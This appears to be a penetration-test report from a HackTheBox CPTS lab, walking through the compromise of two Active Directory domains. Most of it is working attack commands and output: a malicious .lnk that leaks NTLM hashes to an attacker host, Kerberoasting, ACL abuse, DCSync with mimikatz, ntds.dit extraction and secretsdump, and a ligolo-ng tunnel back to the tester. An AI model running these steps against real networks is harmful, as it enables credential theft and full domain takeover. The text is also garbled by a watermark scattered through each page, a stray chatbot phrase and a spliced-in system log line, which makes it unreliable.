Figure 1 - Distribution of identified vulnerabilities

Below is a high-level overview of each finding identified during testing. These findings are covered in
depth in the Technical Findings Details section of this report.
# Severity Level Finding Name Page
1 9.0 (Critical) Remote Code Execution (RCE) 42
2 8.8 (High) SQL Injection (SQLi) 45

# Severity Level Finding Name Page

3 8.5 (High) Account takeover 47

s
4 7.5 (High) Privilege Escalation On API 50

m
5 9.0 (Critical) Remote Code Execution (RCE) On API 52

xa
6 7.5 (High) Werkzeug console RCE via WEBSVC to SRVADM 55
7 8.8 (High) Docker Privilage escalation SRVADM to ROOT
re 58
8 9.3 (Critical) Master Password Disclosure Via NFS share 59
be

9 8.4 (High) GlassFish server RCE 60

cy

10 7.5 (High) Privilege Escalation via SeLoadDriverPrivilege Enabled 63

e/

11 7.8 (High) SeDebugPrivilege Enabled 65

12 7.5 (High) Privilaege escalation via Login session Hijacking 68
.m

13 7.5 (High) Account Takeover via Plain Text Credentials on Sticky Notes 71
//t

14 8.8 (High) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) 73

s:

15 0.0 (Info) zone transfering 75

tp
ht

CONFIDENTIAL
 HACKTHEBOX

5 Internal Network Compromise Walkthrough

During the course of the assessment Tester was able gain a foothold via the external network, move
laterally, and compromise the internal network, leading to full administrative control over the
Trilocor.local Active Directory domain. The steps below demonstrate the steps taken from initial access
to compromise and does not include all vulnerabilities and misconfigurations discovered during the
course of testing. Any issues not used as part of the path to compromise are listed as separate,
standalone issues in the Technical Findings Details section, ranked by severity level. The intent of this
attack chain is to demonstrate to Acme’s the impact of each vulnerability shown in this report and how
they fit together to demonstrate the overall risk to the client environment and help to prioritize
remediation efforts (i.e., patching two flaws quickly could break up the attack chain while the company
works to remediate all issues reported). While other findings shown in this report could be leveraged to
gain a similar level of access, this attack chain shows the initial path of least resistance taken by the
tester to achieve domain compromise.

s
5.1 Detailed Walkthrough

m
Tester performed the following to fully compromise the Trilocor.local domain.

xa
Certainly! Here is the complete narrative: re
1. The tester utilized LaZagne to extract clear text passwords of the pthorp user. This allowed the tester
be
to log in to the active directory machine WS01.
2. The tester began the initial enumeration using powerview.ps1 and Bloodhound. These tools
cy

provided valuable insights into the network and user privileges.

3. During enumeration, the tester discovered that pthorp is a member of the PRINTER 4TH FLOOR group.
e/

Additionally, the tester identified a share called print_job on DC01.trilocor.local.

.m

4. The tester initiated a phishing attack using a malicious .lnk file to capture NTLMv2 hashes. By placing
this file in the print_job share, the tester successfully captured the NTLMv2 hash of user JFLEMMING
//t

using Inveigh.
5. Using BloodHound, the tester identified that JFLEMMING had a GenericWrite ACE for user KSALINAS. This
s:

finding provided a potential privilege escalation path.

tp

6. The tester added a fake SPN for KSALINAS and conducted a Kerberoasting attack using Rubeus. The
obtained hash was then cracked locally using hashcat.
ht

7. With the cracked credentials, the tester logged in as KSALINAS. The user KSALINAS had the necessary
ACE permissions to continue further actions.
8. The tester discovered that KSALINAS was a member of the MSSP CONNECT group, which had WriteOwner
permissions on the TIER I INFRASTRUCTURE group.
9. Leveraging the GenericWrite permissions, the tester added themselves to the MSSP CONNECT group.
10. With WriteOwner permissions on the TIER I INFRASTRUCTURE group, the tester changed the owner of the
TIER I INFRASTRUCTURE group to KSALINAS. This allowed the tester to add KSALINAS to the TIER I
INFRASTRUCTURE group.
11. The TIER I INFRASTRUCTURE group had GenericWrite permissions on the Fileshare Admins group.
The tester used these permissions to add KSALINAS to the Fileshare Admins group.
12. During further exploration of the network shares on DC01.trilocor.local\Deparment share, the tester
identified a Department share that contained private directories. Within the IT_BACKUP02072022
directory, the tester found an encrypted VeraCrypt container.
13. Utilizing hashcat, the tester successfully cracked the password for the VeraCrypt container.

CONFIDENTIAL HTB CPTS 2

 HACKTHEBOX

14. With the password in hand, the tester mounted the VeraCrypt container to a local drive, gaining
access to its contents.
15. Inside the mounted VeraCrypt container, the tester discovered a password-protected psafe3 file.
16. The tester transferred the psafe3 file to their local machine and used hashcat to crack its password.
17. Upon successfully cracking the password, the tester found usernames and passwords for multiple
users stored within the psafe3 file.
18. Armed with these credentials, the tester successfully logged in as a highly privileged service account,
svc_trilocorsync. This account had extensive access and control over the domain.
19. The svc_trilocorsync user had a WriteDACL ACE on the Trilocor.local domain. The tester exploited this
permission to set DCSync permissions for svc_trilocorsync using dacledit.py.
20. With DCSync permissions, the tester used Mimikatz to extract the hash of the administrator password,
thereby compromising the entire trilocor.local domain.

Detailed reproduction steps for this attack chain are as follows:

The tester already has admistrative access on the WS01 machine and used tools LaZagne.exe to retrieve
plaintext passwords stored in the machine . The tester dicoverd that the plaintext password of Pidgin led

s
m
to the compromise of the pthorpeaccount.

xa
re
be
cy
e/
.m
//t

Figure 2 - Screenshot
s:
tp

The tester then utilized runas to log in to the account for ws01 machine runas
ht

/user:trilocor\pthorpe cmd

This provided a command shell. From there, the tester used powershell -ep bypass for the powerhsell access
and for the future enumeration.

CONFIDENTIAL HTB CPTS 3

 HACKTHEBOX

Figure 3 - Powershell

pthorpe user is a member of PRINTER 4TH FLOOR group attacker listed all the associated shares using

s
powerview tool

m
xa
re
be
cy
e/
.m
//t
s:
tp

on DC01.trilocor.local tester detected Print_Jobs share, Now tester can perform a phising attack using
ht

malicious .lnk file.

Then tester created a malicious payload using PowerShell to create a .lnk file:

$objShell = New-Object -ComObject WScript.Shell

$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the dir this file lives in will perform an authentication
request."
$lnk.HotKey = "Ctrl+Alt+O" $lnk.Save()

They copied C:\Malicious.lnk to \\DC01.trilocor.local\Print_jobs and renamed it to

@Malicious.lnk to ensure it appears at the top of the directory:

CONFIDENTIAL HTB CPTS 4

 HACKTHEBOX

Figure 4 - Malicious Lnk File

Next, the Tester initiated Inveigh to capture hashes and were able to capture the hash of JFLEMMING
within 1 min
Invoke-Inveigh -ConsoleOutput Medium -ConsoleUnique N -NBNS Y -mDNS Y -FileOutput Y -
FileOutputDirectory C:\Users\Public\ -SMB Y

s
m
xa
re
be
cy

Figure 5 - Inveigh Output

e/

The Tester then used hashcat to crack the captured hashes,

.m

╭─kali@kali ~/Desktop/CPTS/DC01/HASH
//t

╰─$ hashcat flamming.txt ~/Tools/wordlist/rockyou.txt --show Hash-mode was not specified

with -m. Attempting to auto-detect hash mode.
s:

The following mode was auto-detected as the only one matching your input hash:
tp

5600 | NetNTLMv2 | Network Protocol

ht

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!

Do NOT report auto-detect issues unless you are certain of the hash type.

JFLEMMING::trilocor:8d99e2872749255b:dd9ed1206c2b05247588110dd754decc:010
[[ SNIP ]]
2e00310036002e003100330039002e00330035000000000000000000:[[ REDACTED ]]

Now the Tester can login with cracked password and on the local machine the tester can start the listener
on ligolo-ng for port 445 and transfer all sharphound.exe to the machine WS01 listener_add --addr 0.0.0.0:445
--to 0.0.0.0:445

CONFIDENTIAL HTB CPTS 5

 HACKTHEBOX

s
m
xa
re
be
cy
e/
.m

now on the local machine we can start SMB share using impacket-smbserver tool
impacket-smbserver share -smb2support $(pwd)
//t
s:
tp
ht

and tester copied the sharphound.exe to the ws01 machine on path C:\users\public and run that
sharphound.exe , with same way tester can copy file to SMB share using Powershell.

from bloodhound result the WS01 machine and identified that user JFLEMMING is a member of the HELP
DESK MANAGERS group, which has genericWrite ACE, allowing a targeted Kerberoast attack utilising
Powervew and Rubeus tool

CONFIDENTIAL HTB CPTS 6

 HACKTHEBOX

s
m
Figure 6 - Kerberoast Attack

xa
They created a PSCredential object: re
$SecPassword = ConvertTo-SecureString '[[PASSWORD REDACTED]]' -AsPlainText -Force
be
$Cred2 = New-Object System.Management.Automation.PSCredential('trilocor\JFLEMMING', $SecPassw ord)
cy

teh Using powerview.ps1, they set an SPN for the KSALINAS user

Set-DomainObject -Credential $Cred2 -Identity KSALINAS -SET @{serviceprincipalname='nonexiste nt/BLAHBLAH'}

e/
.m

and viewed the SPN using powerview command

Get-NetUser -SPN | select serviceprincipalname

//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 7

 HACKTHEBOX

Figure 7 - SPN View

They then used Rubeus.exe to perform a Kerberoast attack and saved the hash to hashes.kerberoast:

s
m
PS C:\Users\Public> .\Rubeus.exe kerberoast /user:ksalinas /

Figure 8 - Kerberos attack

xa
then user SMB share to copy the output to local machie and crack the tester cracked the Kerberos output
re
using hashcat:
be
╭─kali@kali ~/Desktop/CPTS/DC01
╰─$ hashcat hashes.kerberoast ~/Tools/wordlist/rockyou.txt --show Hash-mode was not specified
cy

with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only
one matching your input hash:
e/

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

.m

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!

//t

Do NOT report auto-detect issues unless you are certain of the hash type.
$krb5tgs$23$*ksalinas$trilocor.local$nonexistent/
s:

BLAHBLAH@trilocor.local*$3079bcf13a6b71ed58ce841fd3511ef3$664b27c326c1df5
[[ SNIP ]]
tp

eb4cd5f87bd41658b0c0ea0c58ff343f50283ca6e523a2a9f39ce92981ca9f45c00bdaf31ea8424f046973227eea1
e43d38c436047aa9726383d6c3432d11314ba9bd3c026:[[ REDACTED ]]
ht

Now the tester has the password for the ksalinas user and is able logged in with the credentials

Figure 9 - Logged In

User Ksalinas was found to have self ACE on the MSSP CONNECT group:

CONFIDENTIAL HTB CPTS 8

 HACKTHEBOX

Figure 10 - MSSP Connect

so the tester can add the ksalainas to Group MSSP CONNECT using the powershell command

s
Add-DomainGroupMember -identity "MSSP Connect" -Members ksalinas -Domain trilocor.local

m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

Now tester cam add Ksalinas to the TIER I INFRASTRUCTURE group, leveraging their permissions: using
Powerview commands

CONFIDENTIAL HTB CPTS 9

 HACKTHEBOX

s
m
xa
Tester is setting ksalinas as the object owner For TIER I INFRASTRUCTURE Using powerview.
re
Set-DomainObjectOwner -Identity "TIER I INFRASTRUCTURE" -OwnerIdentity "ksalinas" -v
be
Now the ksalinas user can add themselves to the group TIER I INFRASTRUCTURE

Add-DomainGroupMember -Identity "TIER I INFRASTRUCTURE" -Members ksalinas -Domain trilocor.local

cy

Then discovered that TIER I INFRASTRUCTURE has GenericWrite ACE on Fileshare Admins, enabling them to add
e/

Ksalinas to the group:

.m

Using Bloodhound
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 10

 HACKTHEBOX

s
m
xa
re
be
cy
e/
.m

Tester can check the more information using the Powerview commands
//t

PS C:\Users\Public> $sid = Convert-NameToSid "TIER I INFRASTRUCTURE"

s:

PS C:\Users\Public> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} [[ SNIP ]]

tp

ObjectDN : CN=Fileshare Admins,OU=Security Groups,OU=Corp,DC=trilocor,DC=local

ObjectSID : S-1-5-21-748909465-2105014040-255522671-1721
ht

ActiveDirectoryRights : GenericWrite
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength :0
AccessMask : 131112
SecurityIdentifier : S-1-5-21-748909465-2105014040-255522671-1716
AceType : AccessAllowed
AceFlags : ContainerInherit
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : None
AuditFlags : None

Now tester can abuse the ACE to add user ksalinas to the group Fileshare Admins using powerview tool

CONFIDENTIAL HTB CPTS 11

 HACKTHEBOX

Add-DomainGroupMember -Identity "Fileshare Admins" -Members ksalinas -Domain trilocor.local Now Ksalinas is a

member of Fileshare Admins:

s
m
xa
re
be
cy
e/

net user ksalinas /domain

.m

Now the user ksalinas is the member of Fileshare Admins, This will give the user to privilege to View the
//t

Private SMB Shares , while checking the shares tester detected a Department share on DC01.trilocor.local with
s:

read and write permission.

tp
ht

Figure 11 - Private Shares

tester mount the share to WS01 machine using net use command
net use I: \\DC01.trilocor.local\"Deparment Share"

Then used tree command to view the all directory, and Found an interesting Direcorty Inside private
Directory IT_BACKUP02072022

CONFIDENTIAL HTB CPTS 12

 HACKTHEBOX

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

Figure 12 - IT Backup

tester was able to find a veracrypt file inside this Directory

CONFIDENTIAL HTB CPTS 13

 HACKTHEBOX

tester copied the Trilocor_backup_03072022.vc file to the local machine and cracked its password using
hashcat:

hashcat -m 13751 Trilocor_backup_03072022.vc ~/Tools/wordlist/rockyou.txt hashcat (v6.2.6) starting

s
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, POCL_DEBUG) -

m
Platform #1 [The pocl project]

xa
=============================================================================================
=============================================
* Device #1: cpu--0x000, 1438/2940 MB (512 MB allocatable), 4MCU
re
be
[[ SNIP ]]
Initialized device kernels and memoryStarting self-test. Please be patient...Finished selftestDictionary cache hit:
* Filename..: /home/kali/Tools/wordlist/rockyou.txt
cy

* Passwords.: 14344384
* Bytes.....: 139921497
e/

* Keyspace..: 14344384
.m

Starting autotune. Please be patient...Finished

autotune [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
//t

Trilocor_backup_03072022.vc:[[ REDACTED ]]
s:

Session..........: hashcat
tp

Status...........: Cracked
Hash.Mode........: 13751 (VeraCrypt SHA256 + XTS 512 bit (legacy))
ht

Hash.Target......: Trilocor_backup_03072022.vc
[[ SNIP ]]

Then the tester can mounted the decrypted file using Veracrypt

CONFIDENTIAL HTB CPTS 14

 HACKTHEBOX

s
m
xa
Figure 13 - Veracrypt Now
re
be
tester can view the contents inside from the mounted drive
cy
e/
.m
//t
s:
tp
ht

tester discovered a psafe3 file it is password protected,

CONFIDENTIAL HTB CPTS 15

 HACKTHEBOX

s
m
xa
re
be
tester is able to crack the password with hashcat, and access its contents using pwsafe:
cy

╭─kali@kali ~/Desktop/CPTS/DC01/encrypted
╰─$ hashcat -m 5200 trilocor_svc_vault.psafe3 ~/Tools/wordlist/
e/

rockyou.txt
130 ↵ hashcat (v6.2.6) starting
.m

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC,

//t

[[ SNIP ]]
Host memory required for this attack: 0 MB
s:

Dictionary cache hit:

tp

* Filename..: /home/kali/Tools/wordlist/rockyou.txt
* Passwords.: 14344384
ht

* Bytes.....: 139921497
* Keyspace..: 14344384trilocor_svc_vault.psafe3:[[ REDACTED ]]

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: trilocor_svc_vault.psafe3
[[ SNIP ]]

CONFIDENTIAL HTB CPTS 16

 HACKTHEBOX

s
m
xa
re
be
Figure 14 - Psafe3
cy

inside this attacker is able to view the username and password for the users
svc_mssql
e/

svc_sql
.m

svc_ipmi
//t

svc_azc
s:

svc_trilocorsync
tp

from above user tester is able to logged in as the user svc_trilocorsync user runas
ht

/user:trilocor\svc_trilocorsync cmd

The svc_trilocorsync have writeDACL ACE on Trilocor.local this can be exploited by tool like dacledit.py
dacledit.py -action 'write' -rights 'DCSync' -principal 'svc_trilocorsync' -target-dn 'DC=TRI
LOCOR,DC=LOCAL' trilocor.local/svc_trilocorsync:[[ REDACTED ]] -dc-ip 172.16.139.3

Now the svc_trilocorsync have dcsync ACE assigned so the tester can perform a dcsync attack and get hash
of administrator or Kerbtgt account utilizing mimikatz
PS C:\Users\Public> C:\Users\Public\mimikatz.exe "lsadump::dcsync / user:trilocor\administrator" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

CONFIDENTIAL HTB CPTS 17

 HACKTHEBOX

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

## / \ ## /*** Benjamin DELPY g̀entilkiwi`( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:trilocor\administrator

[DC] 'trilocor.local' will be the domain
[DC] 'DC01.trilocor.local' will be the DC server
[DC] 'trilocor\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator

Account Type : 30000000 ( USER_OBJECT )

s
User Account Control : 00110200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD NOT_DELEGATED ) Account

m
expiration :

xa
Password last change : 9/15/2022 1:30:42 AM
Object Security ID : S-1-5-21-748909465-2105014040-255522671-500
Object Relative ID : 500
re
be
Credentials:
Hash NTLM: [[ REDACTED ]]
cy

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
e/

Random Value : 0e8a014b39861cb4940f941f5e5d31bc

.m

* Primary:Kerberos-Newer-Keys *
Default Salt : TRILOCOR.LOCALAdministrator
//t

Default Iterations : 4096 Credentials

aes256_hmac (4096) : [[ REDACTED ]] aes128_hmac (4096) : [[
s:

REDACTED ]] des_cbc_md5 (4096) : [[ REDACTED ]] OldCredentials

tp

aes256_hmac (4096) : [[ REDACTED ]] aes128_hmac (4096) : [[

REDACTED ]] des_cbc_md5 (4096) : [[ REDACTED ]]
ht

OlderCredentials
aes256_hmac (4096) : [[ REDACTED ]] aes128_hmac (4096) : [[
REDACTED ]] des_cbc_md5 (4096) : [[ REDACTED ]]

* Primary:Kerberos *
Default Salt : TRILOCOR.LOCALAdministrator
Credentials
des_cbc_md5 : 8c850d9da24cbc7c
OldCredentials
[[ SNIP ]]

mimikatz(commandline) # exit
Bye!

Now the tester can log in to the administrator of DC01

CONFIDENTIAL HTB CPTS 18

 HACKTHEBOX

Tester then performed the following to fully compromise the Trilocorai.local domain.

1. Tester has access to the DC01 machine as an administrator on domain trailocor.local

2. Tester utilize Powerview tool to enumerate and found that trilocor.local has bidirectional trust on
trilocorai.local
3. The tester can use the tool ligolo-ng and perform tunneling and this will give direct access to the
new IP range of 172.16.210/24 from our local machine.

s
4. Tester started utilizing PowerView to enumerate accounts in trilocorai.local domain that have SPNs

m
associated with them.

xa
5. Tester can see that the account svc_datakeeper has an SPN in the trilocorai.local domain. So the tester
can Kerberoast it and crack the hash offline, the tester can log in with the password to Trilocorai.local
re
domain.
be
6. The Tester can do a Kerberoasting attack across the trust using Rubeus.
7. Then the tester can run the hash through Hashcat and crack the hash then tester able to log in to
cy

svc_datakeeper user on DC02.

8. From the DC02 machine as svc_datakeeper and its normal user and from here tester sterted
e/

enumeration further for the local privilege escalation

9. on machine DC02 Tester detected the username and password of svc_veracrypt
.m

10. Then tester is able to login as svc_veracrypt and detceted svc_veracrypt have privilage of
SeBackupPrivilenge which allows the user to copy ntds.dit and system files.
//t

11. Then using secretsdump.py tool tester is able to view the hashes for the users on the system.
s:

12. Then tester is able to login asadministartor user on machine DC02 using pass the hash
tp

13. from the Document directory tester detected theencrypted password from svc_ipmi.Cred file.
14. Tester decrypted the password and was able to use it on http://17216.210.21:8080/ application
ht

running on machine ADMIN01 , the ipmoniotr application funtionality to execute commands on

server with this tester able change the password for the administrator and login to the ADMIN01
machine

Detailed reproduction steps for this attack chain are as follows:

The tester Already compromised the DC01 machine its Domain controller of trilocor.local domain.
This domain has cross-forest trust on trilocorai.local domain

CONFIDENTIAL HTB CPTS 19

 HACKTHEBOX

Figure 15 - Powerview

s
m
xa
re
be
cy
e/
.m

Figure 16 - BloodHount

from DC01 machine Tester started utilizing PowerView to enumerate accounts in trilocorai.local domain that
//t

have SPNs associated with them

s:

PS C:\Users\Public> Get-DomainUser - SPN - Domain trilocorai.local | select SamAccountName

Get-DomainUser - SPN - Domain trilocorai.local | select SamAccountName
tp

samaccountname
ht

--------------
svc_datakeeper
krbtgt

Tester can see that the account svc_datakeeper has an SPN in the trilocorai.local domain. So the tester can
Kerberoast it and crack the hash offline, the tester can log in with the password to Trilocorai.local domain.

PS C:\Users\Public> Get-DomainUser -Domain trilocorai.local -Identity svc_datakeeper |select

samaccountname,memberof
Get-DomainUser -Domain trilocorai.local -Identity svc_datakeeper |select samaccountname,memberof

samaccountname memberof -------------- -------

svc_datakeeper {CN=Remote Management
Users,CN=Builtin,DC=trilocorai,DC=local,
CN=Event Log Readers,CN=Builtin,DC=tri...
now the testererformed a kerberosting
attack using rubeus tool

CONFIDENTIAL HTB CPTS 20

 HACKTHEBOX

PS C:\users\public> .\Rubeus.exe kerberoast /domain:trilocorai.local /user:svc_datakeeper / nowrap

______ _
(_____ \ ||
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/ v2.2.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or
/tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User : svc_datakeeper

[*] Target Domain : trilocorai.local
[*] Searching path 'LDAP://DC02.trilocorai.local/DC=trilocorai,DC=local' for '(&(samAccountTy
pe=805306368)(servicePrincipalName=*)(samAccountName=svc_datakeeper)(!(UserAccountControl:

s
1.2.840.113556.1.4.803:=2)))'

m
[*] Total kerberoastable users : 1

xa
[*] SamAccountName : svc_datakeeper
re
[*] DistinguishedName : CN=svc_datakeeper,CN=Users,DC=trilocorai,DC=local
be
[*] ServicePrincipalName : datakeeper/admin01.trilocorai.local:80
[*] PwdLastSet : 7/26/2022 7:09:36 AM
cy

[*] Supported ETypes : RC4_HMAC_DEFAULT

[*] Hash : $krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/
e/

admin01.trilocorai.local:80@trilocorai.local*$A84C68FC7426B7AD168BA02412A6F372$C242D39318C7AE
280DAB0296A94FB53FE00E452CAF633B01CBABD5DF94B06F50739[[ SNIP ]]
.m

PS C:\users\public>
//t

Now the tester can copy this into the local machine and crack hash using hashcat
s:

╭─kali@kali ~/Desktop/CPTS/DC02
tp

╰─$ hashcat hash.txt ~/Tools/wordlist/rockyou.txt

hashcat (v6.2.6) starting in autodetect mode
ht

[[ SNIP ]]
Host memory required for this attack: 0 MB

Dictionary cache hit:

* Filename..: /home/kali/Tools/wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/admin01.trilocorai.local:
80@trilocorai.local*$a84c68fc7426b7ad168ba02412a6f372$c242d39318c7ae280dab0296a94fb53fe00e452
caf633b01cbabd5df94b06f50739
[[ SNIP ]]
8c7ab9b8b9a5f22a5fe6ab52e94ee827c2952506763ef9fe4aa9ad8d948f31b4feced23145e4102ee2f7bc5c700fe
8a32ea806ffbf350ca57edf8b56941b4ad0b05e48961341e34af3a7c74f:[[ REDACTED]]

Session..........: hashcat

CONFIDENTIAL HTB CPTS 21

 HACKTHEBOX

Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_datakeeper$trilocorai.local$datake...a7c74f
Time.Started.....: Tue Jun 11 02:14:33 2024 (8 secs)
[[SNIP]]

Now the tester have the password for the svc_datakeeper user but to login to that network tester have set
a tunnel using ligolo-ng.

The machine DC01 is connected to another network in 172.16.210.3/24

s
m
xa
re
be
cy
e/
.m
//t

so tester moved the ligolo-ng agent.exe to the DC01 machine using smb share
s:
tp
ht

CONFIDENTIAL HTB CPTS 22

 HACKTHEBOX

tester created a listener on ligolo-ngon port 11601

s
m
xa
re
be
cy

Then started logolo-ng tunnel for 172.16.210.0/24 range

*Evil-WinRM* PS C:\users\public> ./agent.exe -connect 172.16.139.10:11601 -ignore-cert

e/
.m
//t
s:
tp
ht

now tester is able to login using evil-winrm tool

from further enumeration tester detected user svc_datakeeper is a member of 'Event log Readers'

CONFIDENTIAL HTB CPTS 23

 HACKTHEBOX

after checking the event logs tester detected the username and password for the user svc_veracrypt user

with the credential, the tester is able to login into svc_veracrypt user

s
m
xa
re
be
cy

While checking whoami /priv tester detected SeBackupPrivilege for svc_veracrypt user
e/

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> whoami /priv

.m

PRIVILEGES INFORMATION
//t

----------------------
s:

Privilege Name Description State

tp

============================= ============================== =======

SeMachineAccountPrivilege Add workstations to domain Enabled
ht

SeBackupPrivilege Back up files and directories Enabled

SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

so the tester needs the ntds.dit file to extract the hashes along with the system hive tester move to our
Kali Linux machine and create a dsh file using the nano editor . In this file, tester instructing the
diskshadow to create a copy of the C: Drive into a Z Drive with raj as its alias. The Drive Alias and
Character can be anything tester want. After creating this dsh file, tester use the unix2dos to convert
the encoding and spacing of the dsh file to the one that is compatible with the Windows Machine.

CONFIDENTIAL HTB CPTS 24

 HACKTHEBOX

nano raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
unix2dos raj.dsh

s
m
xa
now tester can run the this command diskshadow

/s raj.dsh
re
be
cy
e/
.m
//t
s:
tp
ht

then tester run robocopy /b z:\windows\ntds . ntds.dit

*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit

-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

CONFIDENTIAL HTB CPTS 25

 HACKTHEBOX

Started : Sunday, June 16, 2024 5:18:07 AM

Source : z:\windows\ntds\
Dest : C:\temp\

Files : ntds.dit

Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

1 z:\windows\ntds\
New File 40.0 m ntds.dit
[[ SNIP ]]
100%
100%

------------------------------------------------------------------------------

Total Copied Skipped Mismatch FAILED Extras

s
Dirs : 1 0 1 0 0 0

m
Files : 1 1 0 0 0 0
Bytes : 40.00 m 40.00 m 0 0 0 0 Times : 0:00:00 0:00:00 0:00:00 0:00:00

xa
Speed : 68871986 Bytes/sec. Speed : 3940.886 MegaBytes/min.
Ended : Sunday, June 16, 2024 5:18:08 AM re
740233172.414604@[613272303871541] (UTM):* SLSGetNextEventRecordInternal: loc (477.6, -705.6) conn 0x10c4fb Scroll
Wheel win 0x1727a Axis1 0 Phase MomentumContinue
be
Then tester the command to create the copy of system
cy

*Evil - WinRM* PS C:\temp> reg save hklm\system c:\Temp\system

The operation completed successfully.
e/
.m

now the tester can download the two using evil-winrm to local machine and use [secretsdump.py] tool to
get the hash
//t

╭─kali@kali ~/Desktop/CPTS/DC02
s:

╰─$ secretsdump.py -ntds ntds.dit -system system local

secretsdump.pyImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation
tp
ht

[*] Target system bootKey: 0x89a11ee03c83c2e093cc9f14ef3800ab

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 81db2a47d32784558062c54bfad8d792
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[[REDACTED]]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[[ REDACTED]]:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:[[ REDACTED]]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[[ REDACTED]]::: [[ SNIP ]]

Now the tester able to login to administrator machine using evil-winrm

CONFIDENTIAL HTB CPTS 26

 HACKTHEBOX

now tester started a ping sweep attack and detected IPs and also for the ADMIN01 172.16.210.21 machine

1..254 | % {"172.16.210.$($_): $(Test-Connection -count 1 -comp 172.16.210.$($_) -quiet)"}

tester started nmap scan on the ip and detected port 8080 was open and ipMonitor 11.2on the port
8080

s
# Nmap 7.94SVN scan initiated Thu Jun 13 02:40:52 2024 as: nmap -sCV -Pn -vv --open --

m
disable-arp-ping -oN nmap/ADMIN01.txt 172.16.210.21
Nmap scan report for 172.16.210.21

xa
Host is up, received user-set (0.19s latency).
Scanned at 2024-06-13 02:40:52 PDT for 96s re
Not shown: 996 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
be
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
cy

139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn

445/tcp open microsoft-ds? syn-ack
e/

8080/tcp open http syn-ack MediaHouse ipMonitor httpd 11.2

|_http-favicon: Unknown favicon MD5: 507B3CE063F4241734C985866F560AB9
.m

|_http-server-header: ipMonitor 11.2 | http-

methods:
//t

|_ Supported Methods: GET HEAD POST

|_http-title: ipMonitor - Log In
s:

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

tp

Host script results:

ht

| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 61832/tcp): CLEAN (Timeout)
| Check 2 (port 43995/tcp): CLEAN (Timeout)
| Check 3 (port 60997/udp): CLEAN (Timeout)
| Check 4 (port 43688/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: ADMIN01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:20:b0
(VMware) |
Names:
| ADMIN01<20> Flags: <unique><active>
| ADMIN01<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active> | Statistics:
| 00:50:56:94:20:b0:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00 | smb2-time:
| date: 2024-06-13T12:22:30
|_ start_date: N/A

